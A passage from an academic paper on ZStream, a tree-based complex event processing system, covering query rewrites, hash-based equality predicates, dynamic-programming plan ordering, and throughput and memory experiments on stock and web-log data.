Their expression complexity and evaluation cost, however, are substantially different. ZStream supports a large number of such algebraic rewrites, similar to those used in most database systems; we omit a complete list due to space constraints. Based on these equivalence rules, we can generate an exponential number of equivalent expressions for any given pattern. Obviously, it is not practical to choose the optimal expression by searching this equivalent expression space exhaustively. Instead, we narrow down the transition space by always trying to simplify the pattern expression; a transition is taken only when the target expression: 1. has a smaller number of operators, or 2. has the same number of operators but contains lower-cost operators. Plans with fewer operators will usually include fewer event classes, and thus are more likely to result in fewer intermediate composed events being generated and less overall work. If the alternative plan has the same number of operators but includes lower-cost operators, it is also preferable.
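The "fewer operators" criterion can be made concrete with a toy operator counter. The nested-tuple encoding and the example pair of equivalent expressions are assumptions of this sketch, not ZStream's internal representation:

```python
# Sketch: count operators in a pattern expression to compare rewrites.
def count_ops(expr):
    """An expression is a leaf event-class name (str) or a tuple
    (operator, left, right) with operator in {';', '&', '|'}."""
    if isinstance(expr, str):
        return 0
    _op, left, right = expr
    return 1 + count_ops(left) + count_ops(right)

# Factored form (A & (B | C)); D : three operators.
factored = (';', ('&', 'A', ('|', 'B', 'C')), 'D')
# Equivalent distributed form ((A & B) | (A & C)); D : four operators.
distributed = (';', ('|', ('&', 'A', 'B'), ('&', 'A', 'C')), 'D')
```

The simplification heuristic would take a transition from the distributed form to the factored form, since the latter has fewer operators (and replaces a conjunction with a cheaper disjunction at the top of the subexpression).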
The cost of operators is as shown in Table 2, which indicates that \( C_{DIS} < C_{SEQ} < C_{CON} \) (NSEQ and KSEQ are not substitutable for other operators). Returning to the two expressions given at the beginning of this section, the optimizer will replace \( Expression_1 \) with \( Expression_2 \), because \( Expression_2 \) has fewer operators and the cost of disjunction is smaller than that of conjunction.

#### 5.2.2 Hashing for Equality Predicates

As a second heuristic optimization step, ZStream replaces equality predicates with hash-based lookups whenever possible. Hashing reduces search costs for equality predicates between different event classes; otherwise, equality multi-class predicates are attached to the associated operators like any other predicates. As shown in Figure 3 (a tree plan for Query 1), the incoming stock stream is first hash partitioned on "name" as T1. Internally, T1 is represented as a hash table, which is maintained when T1 is combined with T2 in the SEQ1 node. When the equality predicate T1.name = T3.name is applied during SEQ2, this lookup can be applied directly as a probe for T3.name in the hash table built on T1. More formally, suppose \( P(A, B, f) \) denotes a predicate \( A.f = B.f \). If A and B are sequentially combined in the order \( A; B \), the hash table is built on \( A.f \) (because \( B \) is used in the outer loop in Algorithm 1). If A and B are conjunctively connected, hash tables are built on both \( A.f \) and \( B.f \) (because either A or B may appear in the outer loop). Hash construction and evaluation can easily be extended to the case where there are multiple equality predicates. Suppose \( P_1(A_1, B_1, f_1) \) and \( P_2(A_2, B_2, f_2) \) are two equality predicates for a sequential pattern where \( A_i \) is before \( B_i \) (\( i = 1, 2 \)). Then, 1. If \( A_1 \neq A_2 \), build hash tables on both \( A_1.f_1 \) and \( A_2.f_2 \). 2.
If \( A_1 = A_2 \) and \( f_1 = f_2 \), build a hash table on \( A_1.f_1 \). 3. Otherwise \( A_1 = A_2 \) and \( f_1 \neq f_2 \); build the primary hash table on \( A_1.f_1 \) and a secondary hash table on \( A_1.f_2 \).

#### 5.2.3 Optimal Reordering

Once a query expression has been simplified using algebraic rewrites and hashing has been applied on the equality attributes, ZStream is left with a logical plan. A given logical plan has a number of different physical trees (e.g., left-deep or right-deep) that can be used to evaluate the query. In this section, we describe an algorithm to search for the optimal physical tree for a sequential pattern. We first observe that the problem of finding the optimal order has optimal substructure, suggesting it is amenable to dynamic programming, as in Selinger [14].

THEOREM 5.1. For a given query, if the tree plan \( T \) is optimal, then all the sub-trees \( T_i \) of \( T \) must be optimal for their corresponding sub-patterns as well.

PROOF. We prove this by contradiction. Suppose the theorem is not true; then it would be possible to find a sub-tree plan \( T_i' \) with lower cost than some \( T_i \), but with the same output cardinality. Using \( T_i' \) as a substitute for \( T_i \), we would then obtain a tree plan \( T' \) with lower total cost for the pattern, which contradicts the assumption that \( T \) is optimal. \( \square \)

Based on the optimal substructure observation in Theorem 5.1, we can search for an optimal tree plan by combining increasingly larger optimal sub-plans together until we have found an optimal plan for the whole pattern. The algorithm to search for the optimal operator order is shown as Algorithm 5. The algorithm begins by calculating the optimal sub-plans for the event sets of size 2. In this case, there is only one operator connecting the event classes; hence its operator order is automatically optimal. In the outermost loop (line 2), the algorithm increases the event set size by 1 each time.
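The optimal-substructure search just described follows the shape of a matrix-chain-style dynamic program over contiguous sub-patterns. A minimal sketch, with a hypothetical `cost(i, r, j)` callback standing in for the operator cost estimates of Table 2 (this mirrors the structure of Algorithm 5, not its exact code):

```python
# Sketch: dynamic-programming search for the cheapest operator ordering
# over contiguous sub-patterns of n event classes.
import math

def optimal_plan(n, cost):
    # best[i][j]: minimal cost of covering event classes i..j (inclusive);
    # root[i][j]: split position chosen for that sub-pattern.
    best = [[0.0] * n for _ in range(n)]
    root = [[None] * n for _ in range(n)]
    for size in range(2, n + 1):               # grow the event-set size by 1
        for i in range(0, n - size + 1):       # all sets of the current size
            j = i + size - 1
            best[i][j] = math.inf
            for r in range(i, j):              # try every root position
                c = best[i][r] + best[r + 1][j] + cost(i, r, j)
                if c < best[i][j]:
                    best[i][j], root[i][j] = c, r
    # The plan is reconstructed by walking the root matrix in reverse.
    return best[0][n - 1], root
```

There are \( O(n^2) \) contiguous sub-patterns and each is scanned once for its root, matching the cubic-time behavior one expects from this style of search; bushy plans fall out naturally because every split position is considered.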
The second loop (line 3) goes over all possible event sets of the current event set size. The third loop (line 4) records the minimal-cost plan found so far by searching over all possible optimal sub-trees. The root of each optimal sub-tree chosen for the current sub-pattern is recorded in the \( ROOT \) matrix. In the end, the optimal tree plan can be reconstructed by walking in reverse from the root of each selected optimal sub-tree. The two function calls `calc_inputcost()` and `calc_CARD()` are used to estimate the input cost and output cost of an operator according to Table 2. Algorithm 5 enumerates all contiguous sub-patterns, and hence generates \( O(n^2) \) subsets in total. For each subset, it performs one pass to find the optimal root position. Hence the total time complexity is \( O(n^3) \). Compared to Selinger [14], Algorithm 5 also takes bushy plans into consideration. In practice, this algorithm is very efficient, requiring less than 10 ms to search for an optimal plan with pattern length 20. Figure 7 illustrates an example of an optimal plan generated when the pattern length is 4. During the final round, where the only event set to consider is the pattern (1, 2, 3, 4), the algorithm tries all possible combinations of sub-lists: 1 with (2, 3, 4); (1, 2) with (3, 4); (1, 2, 3) with 4. The root of each optimal sub-tree is marked. The final optimal (bushy) plan selected for this pattern is shown on the right. <table> <thead> <tr> <th>Operator</th> <th>Description</th> <th>Input Cost \( C_i \)</th> <th>Output Cost \( C_o \)</th> </tr> </thead> <tbody> <tr> <td>Sequence (\( A; B \))</td> <td>\( A \) and \( B \) are two input event classes or partitions. The cost is expressed as the number of input combinations tried.
\( Pt_{A,B} \) captures the fact that the sequence operator does not try to assemble any \( a \) of \( A \) with \( b \) of \( B \) where \( b \) occurs before \( a \).</td> <td>\( CARD_A \ast CARD_B \ast Pt_{A,B} \)</td> <td>\( CARD_A \ast CARD_B \ast P_{A,B} \)</td> </tr> <tr> <td>Conjunction (\( A \& B \))</td> <td>\( A \) and \( B \) are two input event classes or partitions. Unlike Sequence, Conjunction can combine an event \( a \) of \( A \) with any \( b \) of \( B \) within the time window constraint.</td> <td>\( CARD_A \ast CARD_B \)</td> <td>\( CARD_A \ast CARD_B \ast P_{A,B} \)</td> </tr> <tr> <td>Negation (\( A; !B; C \)) (top)</td> <td>Negation on top, expressed as \( NEG(SEQ(A, C), B) \)</td> <td>\( C_{SEQ} + CARD_{SEQ} \ast Pt_{A,B} \ast Pt_{B,C} \)</td> <td>\( CARD_{SEQ} + CARD_{SEQ} \ast (1 - Pt_{A,B} \ast Pt_{B,C}) \ast Pt_{A,C} \)</td> </tr> <tr> <td>Negation (\( A; !B; C \)) (pushed down)</td> <td>Negation pushed down, expressed as \( SEQ(A, NSEQ(B, C)) \)</td> <td>\( CARD_C + CARD_A \ast CARD_C \ast Pt_{A,C} \ast Pt_{B,C} \)</td> <td>\( CARD_C + CARD_A \ast CARD_C \ast Pt_{A,C} \ast Pt_{B,C} \)</td> </tr> </tbody> </table>
In this section, we describe a number of experiments we have run to evaluate the performance of ZStream. Our primary objectives were to understand to what extent the reordering optimizations described in the previous sections affect overall query performance, and by how much ZStream can outperform a previously proposed NFA-based approach [15]. We also look at the performance of negation push-down and the efficiency of plan adaptation. Finally, we test ZStream on some real-world web log data in Section 6.5. ZStream is implemented in C++, using an STL list to maintain the buffer structure. We separately implemented the NFA-based approach described in [15]. It is also C++ based, and uses an STL deque to support RIP pointers on its stack structure. In our experiments, the STL deque (for random lookups) proved to be about 1.5 times faster than the STL list. Note that materialization is not supported in our NFA implementation, because the RIP implementation has difficulty supporting materialization for multi-class range predicates (e.g., A.price > B.price for the sequential pattern A; B). All experiments were run on a dual-core 3.2 GHz Intel Pentium 4 CPU with one core turned off and 2 GB RAM.
We ran ZStream on a pre-recorded data file; data was pulled into the system at the maximum rate the system could accept. System performance was measured by the rate at which input data was processed, i.e.:

\[ \text{rate} = \frac{|\text{Input}|}{t_{\text{elapsed}}} \]

where \( |\text{Input}| \) is the size of the input and \( t_{\text{elapsed}} \) is the total elapsed processing time, not counting the time to deliver the output. The input data is stock trade data with the schema described in Section 3.2. We generated synthetic stock events so that event rates and the selectivity of multi-class predicates could be controlled. All experiments are the average of 30 runs. Peak memory usage is also reported for some experiments.

### 6.1 Parameters Affecting Costs

In this section, we experiment with various factors that affect the costs of query plans, showing that the cost model proposed in Section 5 accurately reflects system performance.

#### 6.1.1 Multi-Class Predicate Selectivity

We ran experiments on Query 4, a sequential pattern with a single predicate on the first two event classes, using a left-deep plan, a right-deep plan, and the NFA-based approach. Here, incoming ticks have a uniform distribution over stock names, meaning relative event rates are 1 : 1 : 1 (that is, one Sun quote arrives for each IBM quote, and one Oracle quote arrives for each Sun quote).

**Query 4.** Sequence pattern "IBM; Sun; Oracle" with a predicate between IBM and Sun

PATTERN IBM; Sun; Oracle
WHERE IBM.price > Sun.price
WITHIN 200 units

Figure 8 shows the throughput of the two alternative plans (the left-deep and the right-deep plan) and the NFA approach for Query 4. The left-deep plan outperforms the right-deep plan because it evaluates the operator with the multi-class predicate between IBM and Sun first, and so generates fewer intermediate results. The lower the selectivity, the fewer intermediate results the left-deep plan produces.
Hence, the gap between the performance of the two plans increases with decreasing selectivity. When the predicate is very selective (1/32, for instance), the left-deep plan outperforms the right-deep plan by as much as a factor of 5.

We also note that the NFA-based approach has similar performance to the right-deep plan in Figure 8. This is because the NFA constructs composite events using a backwards search on a DAG (Directed Acyclic Graph) [15]. This results in the NFA evaluating expressions in a similar order to the right-deep plan. We observe similar behavior for varying selectivity in longer sequential patterns.

Figure 9 shows the estimates produced by our cost model for the left-deep plan and the right-deep plan of Query 4 with varying selectivities. This shows that our cost model can accurately predict the system behavior with varying selectivity.

#### 6.1.2 Event Rates

In this section, we study how varying the relative event rates of different event classes affects the cost of query plans for different queries. The intuition is that query plans that combine event classes with lower event rates first will generate a smaller number of intermediate results; hence such query plans have better performance. To exclude the effect of selectivity, we experiment on a simple sequential pattern (Query 5) without any predicates.

**Query 5.** Sequence Pattern “IBM; Sun; Oracle”

PATTERN IBM; Sun; Oracle
WITHIN  200 units

Figure 10 shows the throughput for three plans (left-deep, right-deep and NFA-based) for Query 5, where we vary the relative event rate between IBM and the other two event classes. When IBM has a higher event rate, the right-deep plan performs best, since IBM is joined later in this plan. The left-deep plan becomes best when IBM’s event rate drops below that of the other two, since IBM is joined earlier in this plan.
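The effect of both selectivity and relative event rates on intermediate-result counts can be illustrated with a back-of-envelope model. This is a hypothetical sketch (not ZStream's actual cost model from Section 5): it ignores window constraints and simply counts the output of the first join for the pattern SEQ(IBM; Sun; Oracle), with an optional predicate between IBM and Sun.

```python
# Hypothetical back-of-envelope model (not ZStream's cost model): estimate
# intermediate-result counts for SEQ(IBM; Sun; Oracle) under a left-deep vs.
# a right-deep plan. `sel` is the selectivity of a predicate between IBM and
# Sun (1.0 means no predicate, as in Query 5). Window constraints are ignored.

def intermediates(n_ibm, n_sun, n_oracle, sel=1.0):
    # Left-deep: (IBM; Sun) is joined first, so the predicate filters early.
    left_deep = n_ibm * n_sun * sel
    # Right-deep: (Sun; Oracle) is joined first; the predicate cannot apply yet.
    right_deep = n_sun * n_oracle
    return left_deep, right_deep

# Query 4 behavior: lower selectivity shrinks only the left-deep intermediates.
print(intermediates(1000, 1000, 1000, sel=1 / 32))   # (31250.0, 1000000)

# Query 5 behavior: a low IBM rate favors the left-deep plan.
print(intermediates(10, 1000, 1000))                 # (10000.0, 1000000)
```

Crude as it is, this counting model mirrors both observations above: the left-deep advantage grows as the predicate becomes more selective, and the best plan flips as the relative rate of IBM changes.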
Figure 11 shows the estimated cost of the left-deep and the right-deep plan with varying relative rates; the estimates exhibit the same performance trends as the measured throughput.

One additional observation from Figures 10 and 11 is that the performance gap between the best and worst performing plans is greater on the right side of the figures. These represent cases where a single event class has a lower relative event rate. Consider the case where the event rate is 1 : 1 : 1. In this case, the performance of all the plans is the same. Now, decreasing a single event class’s rate by a factor of $k$ is equivalent to increasing each of the other event classes’ event rates by a factor of $k$. This results in a factor of $k^{N-1}$ (where $N$ is the total number of event classes) skew in the event distribution. In comparison, on the left side of the figure, increasing the rate of one stream only increases skew by a factor of $k$.

Figure 8: Throughputs of different plans for Query 4 with varying selectivity
Figure 9: $1/estimated\ cost$ of different plans for Query 4 with varying selectivity
Figure 10: Throughputs of different plans for Query 5 with varying relative event rates
Figure 11: $1/estimated\ cost$ of different plans for Query 5 with varying relative event rates

### 6.2 Optimal Plans in More Complex Queries and Memory Usage

In this section, we show that the performance of different physical plans can vary dramatically when statistics change. The experiment is conducted using Query 6, running four different query plans and the NFA-based approach.

**Query 6.** More Complex Query

PATTERN IBM; Sun; Oracle; Google
WHERE   Oracle.price > Sun.price AND Oracle.price > Google.price
WITHIN  100 units

The plans are:

1. Left-deep plan: [[[IBM; Sun]; Oracle]; Google]
2. Right-deep plan: [IBM; [Sun; [Oracle; Google]]]
3. Bushy plan: [[IBM; Sun]; [Oracle; Google]]
4. Inner plan: [[IBM; [Sun; Oracle]]; Google]
5.
NFA

We varied the event rate and selectivity of the different streams to show that the optimal plan changes quite dramatically. Figure 12 illustrates the throughput of the five plans with varying selectivity and relative event rate. For these experiments, we vary the proportion of inputs from the different streams (from its default of 1 : 1 : 1 : 1), as well as the selectivities of the two query predicates (from their default of 1).

When the IBM event rate is low, as shown in the leftmost cluster of bars (rate = 1 : 100 : 100 : 100), the left-deep plan does best. The bushy plan also does well because it also uses IBM in the first (bottommost) operator. The right-deep plan, inner plan and NFA perform poorly because they combine with IBM in a later operator. In the second case, where the first predicate (between Sun and Oracle) is very selective (sel1 = 1/50), the inner plan (which evaluates the first predicate first) does best, and it is almost two times faster than the other plans. The bushy plan in this case does extremely poorly because it defers the evaluation of the first predicate until the final processing step. The third case is good for the right-deep plan and the NFA-based approach because the predicate between the last two event classes is selective (sel2 = 1/50). As expected, the left-deep plan does poorly in this case.

Figure 13 shows the estimates from our cost model (for all plans except NFA), showing that it predicts the real performance behavior well. Based on the cost model, our dynamic programming algorithm (Algorithm 5) should be able to select the optimal plan efficiently.

Table 3 shows the peak memory consumption of the five plans for Query 6 in two cases: (1) when the IBM event rate is very low (rate = 1 : 100 : 100 : 100); and (2) when the predicate between Sun and Oracle is very selective (sel1 = 1/50).
As Table 3 indicates, the peak memory consumption is relatively stable across the different plans (much more stable than their throughput). In general, memory consumption is independent of the input data size. It is the type of the query (pattern length, operator types and time window constraints) and the data characteristics (selectivity and event rate) that affect and bound the memory usage.

### 6.3 Plan Adaptation

In this section, we describe experiments that test ZStream’s plan adaptation features (described in Section 5.3), as well as our dynamic programming algorithm. For these experiments, we concatenated the three streams used in the previous experiment together and ran Query 6 again. In this concatenated stream, the rate of IBM is initially 100x less than the other stocks and the selectivities are both set to 1; then, the IBM rate becomes equal to the others but the selectivity of the first predicate goes to 1/50; finally, the selectivity of the first predicate returns to 1, but the selectivity of the second predicate goes to 1/50.

Table 3: Peak Memory Usage (in MB) for Query 6

<table> <thead> <tr> <th>Plan</th> <th>rate = 1 : 100 : 100 : 100</th> <th>sel1 = 1/50</th> </tr> </thead> <tbody> <tr> <td>Left-deep</td> <td>7.36</td> <td>7.96</td> </tr> <tr> <td>Right-deep</td> <td>7.45</td> <td>6.91</td> </tr> <tr> <td>Bushy</td> <td>6.72</td> <td>6.73</td> </tr> <tr> <td>Inner</td> <td>7.85</td> <td>6.47</td> </tr> <tr> <td>NFA</td> <td>6.70</td> <td>6.55</td> </tr> </tbody> </table>

We compared the performance of our adaptive, dynamic programming based algorithm, which continuously monitors selectivities and rates, to the same fixed plans used in the previous experiment (we omit the bushy plan for clarity in the figure). Figure 14 shows the results, with throughput on the Y axis and time on the X axis (with the stream parameters changing at the tick marks). We show three points for each approach.
These points represent the average throughput for the three stream segments corresponding to the three varying sets of parameters. Notice that the adaptive algorithm is able to select a plan that is nearly as good as the best of the other plans. The performance of left-deep, right-deep, inner, and NFA is similar to the results shown in Figure 12.

### 6.4 Negation Push Down

As discussed earlier, one way to evaluate negation queries is to put a negation filter NEG on top of the entire query plan, and filter out the negated composite events as a post-filtering step. The alternative approach is to use the NSEQ operator to directly incorporate negation into the query plan tree. We compare the performance of these two methods in this section on Query 7:

**Query 7.** Negation Pattern “IBM; !Sun; Oracle”

PATTERN IBM; !Sun; Oracle
WITHIN  200 units

The experiment is run on two query plans:

1. **Plan 1:** Use an NSEQ operator to combine Sun and Oracle first. Then a SEQ operator is applied to combine IBM with the results from the NSEQ.
2. **Plan 2:** Use a SEQ operator to combine IBM and Oracle first. Then a negation filter NEG is applied to rule out the (IBM, Oracle) pairs where Sun events occurred in between.

Figures 15 and 16 illustrate the results for these two plans with varying relative event rates. In both figures, Plan 1 always outperforms Plan 2. When the event distribution is skewed, the performance increases faster for Plan 1 because it generates many fewer intermediate results than Plan 2. As shown in Figure 15, however, when Oracle event rates increase, the throughput of Plan 1 decreases slightly. This is due to the way in which NSEQ works.
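The matching strategy behind NSEQ can be sketched as follows. This is an illustrative sketch over timestamped events; the function name and structure are ours, not ZStream's C++ implementation:

```python
import bisect

# Illustrative sketch of NSEQ(Sun, Oracle) matching (names and structure are
# ours, not ZStream's implementation): pair each Oracle event with the latest
# Sun event that occurred strictly before it. A subsequent SEQ with IBM then
# only accepts IBM events arriving after that Sun event, which guarantees no
# Sun event lies between the matched IBM and Oracle events.

def nseq(sun_times, oracle_times):
    sun_times = sorted(sun_times)
    matches = []
    for o in oracle_times:
        k = bisect.bisect_left(sun_times, o)       # Sun events strictly before o
        latest_sun = sun_times[k - 1] if k > 0 else None
        matches.append((o, latest_sun))
    return matches

print(nseq(sun_times=[3, 8, 15], oracle_times=[5, 10, 20]))
# [(5, 3), (10, 8), (20, 15)] -- e.g. for the Oracle event at t=10, only an
# IBM event in the open interval (8, 10) can complete "IBM; !Sun; Oracle".
```

Because every Oracle event triggers one such lookup, raising the Oracle rate increases the work NSEQ performs, consistent with the slight throughput drop for Plan 1 noted above.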
As shown in Algorithm 2, NSEQ matches each Oracle event $o$ with the latest Sun event before $o$. Hence, increasing the rate of Oracle increases the amount of computation done by NSEQ, which counteracts the benefits of the skewed distribution here (we observe similar results when increasing the IBM event rates). Another observation is that the throughput of Plan 2 increases much more quickly when the event distribution is biased towards Sun events. This is because Plan 2 combines IBM and Oracle first, and a distribution biased toward Sun results in relatively fewer (IBM, Oracle) pairs.

### 6.5 Web Access Pattern Detection

In this section, we demonstrate the efficiency of ZStream on real-world log data. The web log data covers a one-month period (from 22/Feb/2009 to 22/Mar/2009) and contains more than 1.5 million web access records from the MIT DB Group web server. The records have the schema (Time, IP, Access-URL, Description).

**Query 8.** Web Access Pattern “Publication; Project; Course”

PATTERN Publication; Project; Course
WHERE   same IP address
WITHIN  10 hours

In this data, we observed that some users who download publications from our server are also interested in the web pages for research projects and courses offered by our group. To detect users with this access pattern, we wrote Query 8. We chose a sequential pattern here instead of a conjunction pattern because we wanted to compare with the performance of NFA, which doesn’t support conjunction. The statistics on the number of records that access these different file types are shown in Table 4.
Table 4: Number of Records Accessing Publications, Projects, and Courses

<table> <thead> <tr> <th></th> <th>publication</th> <th>project</th> <th>courses</th> </tr> </thead> <tbody> <tr> <td># of accesses</td> <td>975</td> <td>11610</td> <td>16083</td> </tr> </tbody> </table>

Figure 17: Throughputs of different plans for Query 8 on one month of web access log data

Table 5: Peak Memory Usage (in MB) for Query 8

<table> <thead> <tr> <th></th> <th>left-deep</th> <th>right-deep</th> <th>NFA</th> </tr> </thead> <tbody> <tr> <td>Peak Mem (MB)</td> <td>10.13</td> <td>10.66</td> <td>10.55</td> </tr> </tbody> </table>

As Figure 17 shows, the left-deep plan performs best: the number of accesses to publications is much smaller than the number of accesses to projects and courses, as shown in Table 4. Hence many fewer intermediate results are generated by the left-deep plan. This is consistent with the results from Section 6.1.2. NFA is a little slower than the right-deep plan because our NFA implementation does not support materialization; materialization is relatively important in this case because Query 8 has a very long time window (10 hours) and most materialized intermediate tuples can be reused. The peak memory usage for these three plans is shown in Table 5.

## 7. CONCLUSION

This paper presented ZStream, a high-performance CEP system designed and implemented to efficiently process sequential patterns. ZStream is also able to support other relations such as conjunction, disjunction, negation and Kleene Closure. Unlike previous systems that evaluate CEP queries in a fixed order using NFAs, ZStream uses a tree-based plan for both the logical and physical representation of query patterns. A single pattern may have several equivalent physical tree plans, with different evaluation costs. Hence, we proposed a cost model to estimate the computation cost of a plan. Our experiments showed that the cost model can capture the real evaluation cost of a query plan accurately.
Based on this cost model and using a simple set of statistics about operator selectivity and data rates, we showed that ZStream is able to adjust the order in which it detects patterns on the fly. In addition to these performance benefits, a tree-based infrastructure allows ZStream to unify the evaluation of sequences, conjunctions, disjunctions, sequential negations and Kleene Closures as variants of the join operator. This formulation allows flexible operator ordering and intermediate result materialization.

## 8. ACKNOWLEDGMENTS

We thank Brian Cooper, Donald Kossmann and the other reviewers for their invaluable suggestions on this paper. We also thank Michael Stonebraker for his insightful advice. This work was supported under NSF Grant NETS-NOSS 0520032.

## 9. REFERENCES